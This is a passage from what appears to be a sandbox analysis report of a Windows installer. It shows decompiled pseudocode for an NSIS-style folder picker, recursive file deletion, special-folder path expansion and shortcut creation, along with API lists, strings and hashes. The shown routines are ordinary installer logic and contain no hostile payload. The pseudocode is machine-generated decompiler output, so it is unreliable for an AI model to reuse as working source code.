								if(0 == 0x428fa8) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x428fa8,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405546(0x428fa8) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x428fa8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040464C(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42e33c + 0x10)) != _t145) {
									E00404597(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x428f98);
									} else {
										E00404597(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x42ec04 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403DE0(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x429fcc == _t145) {
									E00404191();
								}
								 *0x429fcc = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x429fe0;
							_v56 = E00404531;
							_v52 = _t162;
							_v64 = E00405A2E(0x3fb, 0x429fe0, _t162, 0x4293b0, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004054FF(_t162);
								_t125 =  *((intOrPtr*)( *0x42eb70 + 0x11c));
								if( *((intOrPtr*)( *0x42eb70 + 0x11c)) != 0 && _t162 == "C:\\Baldi") {
									E00405A2E(0x3fb, 0x429fe0, _t162, 0, _t125);
									if(lstrcmpiA(0x42db00, 0x429fe0) != 0) {
										lstrcatA(_t162, 0x42db00);
									}
								}
								 *0x429fcc =  &(( *0x429fcc)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040556C(_t162) != 0 && E00405593(_t162) == 0) {
						E004054FF(_t162);
					}
					 *0x42e338 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DBE(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DBE(_t159);
					E00403DF3(_v12);
					_t138 = E00405D2E(7);
					if(_t138 == 0) {
						L53:
						return E00403E25(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x00404202
0x00404209
0x00404215
0x00404223
0x0040422b
0x0040422f
0x00404235
0x00404235
0x00404241
0x004042b5
0x004042bc
0x00404391
0x00404398
0x004043a7
0x004043a7
0x004043ab
0x004043b1
0x004043be
0x004043c0
0x004043c0
0x004043ce
0x004043d3
0x004043d6
0x004043dd
0x004043e0
0x00404417
0x00404419
0x0040441f
0x00404426
0x00404428
0x00404428
0x00404444
0x00404480
0x00000000
0x00404446
0x00404449
0x0040445d
0x0040445f
0x00000000
0x0040445f
0x004043e2
0x004043e6
0x00404415
0x00404415
0x00000000
0x00000000
0x00000000
0x00000000
0x004043e8
0x004043e8
0x004043f5
0x004043fa
0x00000000
0x00000000
0x004043fe
0x00404400
0x00404400
0x0040440b
0x0040440e
0x00404413
0x00000000
0x00000000
0x00000000
0x00000000
0x00404413
0x0040446e
0x00404475
0x0040447c
0x00404483
0x00404483
0x00404488
0x0040448a
0x00404492
0x00404498
0x00404498
0x004044a8
0x004044b2
0x004044ba
0x004044d0
0x004044bc
0x004044c0
0x004044c0
0x004044ba
0x004044d5
0x004044da
0x004044df
0x004044e8
0x004044e8
0x004044f1
0x004044f3
0x004044f3
0x004044ff
0x00404507
0x00404511
0x00404511
0x00404516
0x00000000
0x00404516
0x004043e0
0x0040439a
0x004043a1
0x00000000
0x00000000
0x00000000
0x004043a1
0x004042c2
0x004042c8
0x004042e2
0x004042e7
0x004042f1
0x004042f8
0x00404307
0x0040430a
0x0040430d
0x00404314
0x0040431c
0x0040431f
0x00404323
0x0040432a
0x00404332
0x0040438a
0x00404334
0x00404335
0x0040433c
0x00404346
0x0040434e
0x0040435b
0x0040436f
0x00404373
0x00404373
0x0040436f
0x00404378
0x00404383
0x00404383
0x00404332
0x00000000
0x004042e7
0x004042d5
0x00000000
0x00000000
0x004042db
0x00000000
0x00404243
0x00404243
0x0040424f
0x00404259
0x00404266
0x00404266
0x0040426c
0x00404275
0x0040427e
0x00404281
0x00404284
0x0040428c
0x0040428f
0x00404292
0x0040429a
0x004042a1
0x004042a8
0x0040451c
0x0040452e
0x0040452e
0x004042b3
0x00000000
0x004042b3

APIs

GetDlgItem.USER32 ref: 00404248
SetWindowTextA.USER32(?,?), ref: 00404275
SHBrowseForFolderA.SHELL32(?,004293B0,?), ref: 0040432A
CoTaskMemFree.OLE32(00000000), ref: 00404335
lstrcmpiA.KERNEL32(0042DB00,00429FE0,00000000,?,?), ref: 00404367
lstrcatA.KERNEL32(?,0042DB00), ref: 00404373
SetDlgItemTextA.USER32 ref: 00404383

Part of subcall function 004052B1: GetDlgItemTextA.USER32 ref: 004052C4

Part of subcall function 00405C6E: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CC6
Part of subcall function 00405C6E: CharNextA.USER32(?,?,?,00000000), ref: 00405CD3
Part of subcall function 00405C6E: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CD8
Part of subcall function 00405C6E: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CE8

GetDiskFreeSpaceA.KERNEL32(00428FA8,?,?,0000040F,?,00428FA8,00428FA8,?,00000000,00428FA8,?,?,000003FB,?), ref: 0040443C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404457
SetDlgItemTextA.USER32 ref: 004044D0

Strings

C:\Baldi, xrefs: 00404350
A, xrefs: 00404323

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Baldi
API String ID: 2246997448-1211760269
Opcode ID: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
Instruction ID: 52dfe11e264a0fce323933678d720eed1997f61c196974170264a293bd140da1
Opcode Fuzzy Hash: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
Instruction Fuzzy Hash: 19915FB1A00219ABDF11AFA1CC85AAF7BB8EF84315F10407BFA00B6291D77C99418F59

Uniqueness

Uniqueness Score: -1.00%

Function 00405331 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00405331(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004055E0(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72);
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42ebe8 =  *0x42ebe8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A0C(0x42afe8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405546(_t72);
					} else {
						lstrcatA(0x42afe8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42afe8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E0040552A( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A0C(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004056C4(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404DAA(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42ebe8 =  *0x42ebe8 + 1;
										} else {
											E00404DAA(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E0040575A();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405331(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42afe8 - 0x5c;
					if( *0x42afe8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D07(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004054FF(_t72);
							E004056C4(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404DAA(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404DAA(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E0040575A();
						}
						L33:
						 *0x42ebe8 =  *0x42ebe8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x0040533c
0x00405340
0x00405349
0x0040534c
0x0040534f
0x00405357
0x00405359
0x0040535a
0x00000000
0x0040535a
0x00405369
0x00405369
0x0040536c
0x0040536f
0x00405383
0x0040538a
0x0040538f
0x00405391
0x004053a1
0x00405393
0x00405399
0x00405399
0x004053a6
0x004053a9
0x004053b4
0x004053ba
0x004053bf
0x004053cf
0x004053d1
0x004053d7
0x004053da
0x004053dd
0x0040549a
0x0040549a
0x0040549e
0x004054a0
0x004054a0
0x004054a0
0x004054a0
0x00000000
0x00000000
0x00000000
0x00000000
0x004053e3
0x004053e3
0x004053ec
0x004053f2
0x004053f7
0x004053fa
0x004053fc
0x00405400
0x00405402
0x00405402
0x00405400
0x00405405
0x00405408
0x0040541b
0x0040541d
0x00405422
0x00405429
0x00405441
0x00405447
0x0040544d
0x0040544f
0x00405474
0x00405451
0x00405451
0x00405455
0x00405469
0x00405457
0x0040545a
0x0040545f
0x00405461
0x00405462
0x00405462
0x00405455
0x0040542b
0x00405431
0x00405433
0x00405439
0x00405439
0x00405433
0x00000000
0x00405429
0x0040540a
0x0040540d
0x0040540f
0x00000000
0x00000000
0x00405411
0x00405413
0x00000000
0x00000000
0x00405415
0x00405419
0x00000000
0x00000000
0x00000000
0x00405479
0x00405483
0x00405489
0x00405489
0x00405494
0x00000000
0x00405494
0x004053ab
0x004053b2
0x00000000
0x00000000
0x00000000
0x00405371
0x00405371
0x00405373
0x004054a4
0x004054a7
0x004054aa
0x004054fc
0x004054fc
0x004054fc
0x004054ac
0x004054af
0x004054ba
0x004054bf
0x004054c1
0x00000000
0x00000000
0x004054c4
0x004054ca
0x004054d0
0x004054d6
0x004054d8
0x00000000
0x004054f4
0x004054da
0x004054de
0x00000000
0x00000000
0x004054e3
0x004054e8
0x004054e9
0x00000000
0x004054ea
0x004054b1
0x004054b1
0x00000000
0x004054b1
0x00405379
0x0040537d
0x00000000
0x00000000
0x00000000
0x0040537d

APIs

DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 0040534F
lstrcatA.KERNEL32(0042AFE8,\*.*,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 00405399
lstrcatA.KERNEL32(?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 004053BA
lstrlenA.KERNEL32(?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 004053C0
FindFirstFileA.KERNEL32(0042AFE8,?,?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 004053D1
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405483
FindClose.KERNEL32(?), ref: 00405494

Strings

"C:\Users\user\Desktop\file.exe", xrefs: 0040533B
C:\Users\user\AppData\Local\Temp\, xrefs: 00405331
\*.*, xrefs: 00405393

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\file.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-934095819
Opcode ID: fb5f0b97fd6045d75f3de5e206462d23269cef9c6319140f549f9214963cb2b4
Instruction ID: 46a167c19d0f92bb62e791f7a1b0a3e0954e7dde2177130d433e16ae92940f3d
Opcode Fuzzy Hash: fb5f0b97fd6045d75f3de5e206462d23269cef9c6319140f549f9214963cb2b4
Instruction Fuzzy Hash: 84510130904A5476DB21AB218C85BFF3A68DF4231AF14813BF941752D2C77C49C2DE5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405A2E Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405A2E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42e33c - 4 + _t36 * 4);
				}
				_t74 =  *0x42eb98 + _t36;
				_t37 = 0x42db00;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42db00;
				if(_a4 - 0x42db00 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405A2E(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42db00;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405A0C(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E0040596A(_t86,  *0x42eb68);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405C6E(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42ebe4;
						if( *0x42ebe4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42eb64;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42eb68,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42eb98;
							E004058F3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42eb98, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405A2E(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A0C(_a4, _t37);
			}

0x00405a2e
0x00405a2e
0x00405a2e
0x00405a34
0x00405a39
0x00405a4a
0x00405a4a
0x00405a55
0x00405a57
0x00405a5c
0x00405a5f
0x00405a60
0x00405a67
0x00405a69
0x00405a6f
0x00405a72
0x00405a72
0x00405c4b
0x00405c4b
0x00405c4f
0x00000000
0x00000000
0x00405a7f
0x00405a85
0x00000000
0x00000000
0x00405a8b
0x00405a8c
0x00405a8f
0x00405a92
0x00405c3e
0x00405c48
0x00405c4a
0x00405c4a
0x00405c40
0x00405c42
0x00405c44
0x00405c45
0x00405c45
0x00000000
0x00405c3e
0x00405a98
0x00405a9c
0x00405aac
0x00405ab0
0x00405ab7
0x00405aba
0x00405abe
0x00405ac4
0x00405ac7
0x00405aca
0x00405acd
0x00405be8
0x00405beb
0x00405c1b
0x00405c1e
0x00405c23
0x00405c27
0x00405c27
0x00405c2c
0x00405c2d
0x00405c32
0x00405c35
0x00405c37
0x00000000
0x00405c37
0x00405bed
0x00405bf0
0x00405c05
0x00405c0c
0x00405bf2
0x00405bf9
0x00405bf9
0x00405c14
0x00405c17
0x00405be0
0x00405be1
0x00405be1
0x00000000
0x00405c17
0x00405ad5
0x00405ad6
0x00405adc
0x00405ade
0x00405af8
0x00405af8
0x00405aff
0x00405aff
0x00405b06
0x00405b0a
0x00405b0a
0x00405b0b
0x00405b0d
0x00405b46
0x00405b49
0x00405b59
0x00405b5c
0x00405b64
0x00405b6a
0x00405b6a
0x00405bc6
0x00405bc6
0x00405bc8
0x00000000
0x00000000
0x00405b6e
0x00405b75
0x00405b76
0x00405b78
0x00405b92
0x00405ba0
0x00405ba6
0x00405ba8
0x00405bc3
0x00405bc3
0x00405bc3
0x00000000
0x00405bc3
0x00405bae
0x00405bb9
0x00405bbf
0x00405bc1
0x00000000
0x00000000
0x00000000
0x00405bc1
0x00405b7a
0x00405b7d
0x00000000
0x00000000
0x00405b8c
0x00405b8e
0x00405b90
0x00000000
0x00000000
0x00000000
0x00405b90
0x00000000
0x00405bc6
0x00405b51
0x00000000
0x00405b0f
0x00405b14
0x00405b2a
0x00405b2f
0x00405b32
0x00405bcf
0x00405bcf
0x00405bd3
0x00405bdb
0x00405bdb
0x00000000
0x00405bd3
0x00405b3c
0x00405bca
0x00405bca
0x00405bcd
0x00000000
0x00000000
0x00000000
0x00405bcd
0x00405b0d
0x00405ae0
0x00405ae4
0x00000000
0x00000000
0x00405ae6
0x00405aea
0x00000000
0x00000000
0x00405aec
0x00405af0
0x00000000
0x00405af2
0x00405af2
0x00000000
0x00405af2
0x00405af0
0x00405c55
0x00405c5f
0x00405c6b
0x00405c6b
0x00000000

APIs

GetVersion.KERNEL32(?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405AD6
GetSystemDirectoryA.KERNEL32 ref: 00405B51
GetWindowsDirectoryA.KERNEL32(0042DB00,00000400), ref: 00405B64
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405BA0
SHGetPathFromIDListA.SHELL32(?,0042DB00), ref: 00405BAE
CoTaskMemFree.OLE32(?), ref: 00405BB9
lstrcatA.KERNEL32(0042DB00,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BDB
lstrlenA.KERNEL32(0042DB00,?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405C2D

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B20
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405BD5

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
Instruction ID: e3937826694aa96a66c9679703be47664347117baa65301e61951ea2719d1281
Opcode Fuzzy Hash: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
Instruction Fuzzy Hash: DB51F331A04B05AAEF219B689C84BBF3BB4DB15314F54423BE912B62D0D27C6D42DF4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402020 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E0040556C(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Baldi");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
